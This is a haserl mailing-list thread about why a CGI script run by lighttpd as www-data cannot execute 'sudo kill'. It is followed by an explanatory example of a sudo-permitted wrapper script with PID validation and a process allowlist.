Well, I have several .sh scripts executed through lighttpd/haserl. It is
strange: several other commands, also with sudo, are executed fine.

Now I tried:

<% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
<%

`id > output`

echo "id is : "
cat output

`sudo /usr/kill -9 1593 > output`

echo "result is "
cat output

%>


I get:

id is : uid=33(www-data) gid=33(www-data)
groups=29(audio),33(www-data),38(led)
result is


Empty, kill silently fails.
Strange thing is that if I su to www-data on
the console and pass the same command "sudo /usr/kill -9 1593" to the haserl
wrapper, I have the process correctly killed.

>
> At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote:
>> Dear,
>>
>> I am working on an embedded Linux, ARM-based board, and using the very
>> nice haserl tool.
>>
>> I am trying to issue a "kill -9" from a .cgi passed to haserl_wrapper.
>>
>> This is the script of the "test.cgi":
>>
>> <% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
>> <%
>> echo test kill
>>
>> sudo /usr/kill -9 1593
>> %>
>>
>>
>> If I work on the console and pass the file to haserl_wrapper, it works,
>> the process is killed properly.
>> From the web (actually using lighttpd), echo is redirected as web output
>> and kill doesn't work.
>>
>> Any help is really appreciated.
>>
>> Thanks,
>> Angelo
From: Scott S. <ha...@my...> - 2014-03-06 18:42:29
You can also create a wrapper for haserl to call that provides the desired functions, and then configure sudo to allow the web user to execute that one script. You can even control the options accepted with sudo. This is flexible and easy to maintain, and you can move additional logic out into the wrapper. Again, not the best security in a wide open system, but in a closed environment it works acceptably well. I have one site going on 6 years and no breaks.

On Thu, Mar 6, 2014 at 12:04 PM, Daniel Griscom <gr...@su...> wrote:
> I doubt your web server executes scripts with the permissions
> necessary to run sudo without a password (I certainly hope not).
>
> In any case, I'd put in some test echo statements that give the ID of
> the process when the script is executed, and perhaps echo the
> return value of the sudo (i.e. did it fail?).
>
> You might want to make an external script (kept OUTSIDE of the web
> tree) that is SUID root and does what you need it to. Then have this
> script execute the SUID one. Even that's a bit iffy in the security
> department, though.
>
>
> Dan
>
>
> At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote:
> >Dear,
> >
> >I am working on an embedded Linux, ARM-based board, and using the very
> >nice haserl tool.
> >
> >I am trying to issue a "kill -9" from a .cgi passed to haserl_wrapper.
> >
> >This is the script of the "test.cgi":
> >
> ><% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
> ><%
> > echo test kill
> >
> > sudo /usr/kill -9 1593
> >%>
> >
> >
> >If I work on the console and pass the file to haserl_wrapper, it works,
> >the process is killed properly.
> >From the web (actually using lighttpd), echo is redirected as web output
> >and kill doesn't work.
> >
> >Any help is really appreciated.
> >
> >Thanks,
> >Angelo
>
>
> --
> Daniel T. Griscom                             gr...@su...
> Suitable Systems                      http://www.suitable.com/
> 1 Centre Street, Suite 204                    (781) 665-0053
> Wakefield, MA  01880-2400
From: Daniel G. <gr...@su...> - 2014-03-06 18:36:26
I doubt your web server executes scripts with the permissions
necessary to run sudo without a password (I certainly hope not).

In any case, I'd put in some test echo statements that give the ID of
the process when the script is executed, and perhaps echo the
return value of the sudo (i.e. did it fail?).

You might want to make an external script (kept OUTSIDE of the web
tree) that is SUID root and does what you need it to. Then have this
script execute the SUID one. Even that's a bit iffy in the security
department, though.


Dan


At 6:51 PM +0100 3/6/14, Angelo Dureghello wrote:
>Dear,
>
>I am working on an embedded Linux, ARM-based board, and using the very
>nice haserl tool.
>
>I am trying to issue a "kill -9" from a .cgi passed to haserl_wrapper.
>
>This is the script of the "test.cgi":
>
><% . /usr/local/lib/cgi/generic.sh; print_http_hdr %>
><%
> echo test kill
>
> sudo /usr/kill -9 1593
>%>
>
>
>If I work on the console and pass the file to haserl_wrapper, it works,
>the process is killed properly.
>From the web (actually using lighttpd), echo is redirected as web output
>and kill doesn't work.
>
>Any help is really appreciated.
>
>Thanks,
>Angelo

-- 
Daniel T. Griscom                             gr...@su...
Suitable Systems                      http://www.suitable.com/
1 Centre Street, Suite 204                    (781) 665-0053
Wakefield, MA  01880-2400
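Pulling together the advice in this thread (Dan's tips: drop the backticks, print sudo's return value with $?, test from the command line first; Scott's and Dan's suggestion of one sudo-permitted wrapper kept outside the web tree), here is an added example. It is not code from this thread or from the haserl project. The wrapper path /usr/local/sbin/webctl, the sudoers line, the process-name allowlist and the exit codes are assumptions made for illustration; the lighttpd and haserl_wrapper behaviour it relies on is only what the thread already describes.

```shell
#!/bin/sh
# Added example, not code from the haserl thread or the haserl project.
# Two pieces the thread talks around:
#   1. a root-run wrapper that www-data may invoke through sudo, which only
#      signals processes whose command name is on an allowlist, and
#   2. the CGI-side call that reports sudo's exit status instead of hiding
#      it inside backticks.
# Paths, the sudoers rule and the allowlist are assumptions for illustration:
#   wrapper installed as /usr/local/sbin/webctl, root-owned, mode 0755,
#   outside the web tree; sudoers line:
#     www-data ALL=(root) NOPASSWD: /usr/local/sbin/webctl
# The rule names the wrapper, not kill(1), so the web user cannot choose
# arbitrary PIDs or signals.

# Command names the wrapper is willing to signal (assumed daemon names).
ALLOWED_COMMS="mydaemon sensord"

# is_numeric_pid PID -> 0 if PID is a positive decimal integer with no
# leading zero ("0" and "007" are rejected: kill 0 would signal the whole
# process group), else 1
is_numeric_pid() {
    case "$1" in
        ''|*[!0-9]*|0*) return 1 ;;
        *) return 0 ;;
    esac
}

# comm_allowed COMM -> 0 if COMM is one of ALLOWED_COMMS, else 1
comm_allowed() {
    for c in $ALLOWED_COMMS; do
        [ "$1" = "$c" ] && return 0
    done
    return 1
}

# pid_comm PID -> prints the command name of PID, empty if no such process.
# Reads /proc on Linux, falls back to ps(1) elsewhere; always exits 0.
pid_comm() {
    if [ -r "/proc/$1/comm" ]; then
        cat "/proc/$1/comm"
    else
        ps -o comm= -p "$1" 2>/dev/null || true
    fi
}

# webctl_kill PID -> validates PID and sends SIGTERM. Distinct exit codes let
# the CGI side tell a bad argument (2) from a missing process (3), a process
# not on the allowlist (4) and a kill(1) failure (5). Diagnostics go to
# stderr, which under lighttpd ends up in the server error log, not the page.
webctl_kill() {
    pid="$1"
    is_numeric_pid "$pid" || { echo "webctl: invalid pid '$pid'" >&2; return 2; }
    comm="$(pid_comm "$pid")"
    [ -n "$comm" ] || { echo "webctl: no process $pid" >&2; return 3; }
    comm_allowed "$comm" || { echo "webctl: '$comm' is not permitted" >&2; return 4; }
    kill -TERM "$pid" || return 5
}

# CGI side: what the haserl <% %> block calls. sudo -n never prompts; with no
# tty the web server could not answer a password prompt anyway, so a sudoers
# rule that does not match fails fast with a message and a non-zero status.
# stderr is merged into the page so the reason is visible while debugging.
cgi_kill() {
    sudo -n /usr/local/sbin/webctl kill "$1" 2>&1
    rc=$?
    echo "sudo result is $rc"
    return $rc
}

# Dispatch when invoked as the installed script. With no arguments (for
# example when this file is sourced) nothing runs, so the functions above
# can be exercised directly.
case "$1" in
    kill) webctl_kill "$2" ;;
esac
```

In the haserl page the whole call collapses to `sudo -n /usr/local/sbin/webctl kill 1593; echo "sudo result is $?"` after the header has been printed. Writing it as `` `sudo ... > output` `` instead, as in the test script above, runs sudo, throws its exit status away, and then tries to execute whatever the substitution produced (nothing, since stdout went to the file), which is why the page showed an empty result rather than an error. Run the wrapper by hand as www-data, then through lighttpd: a 0 from the first and a 1 from the second points at the sudo policy or the environment the web server gives the script (no tty, a different PATH) rather than at the script itself.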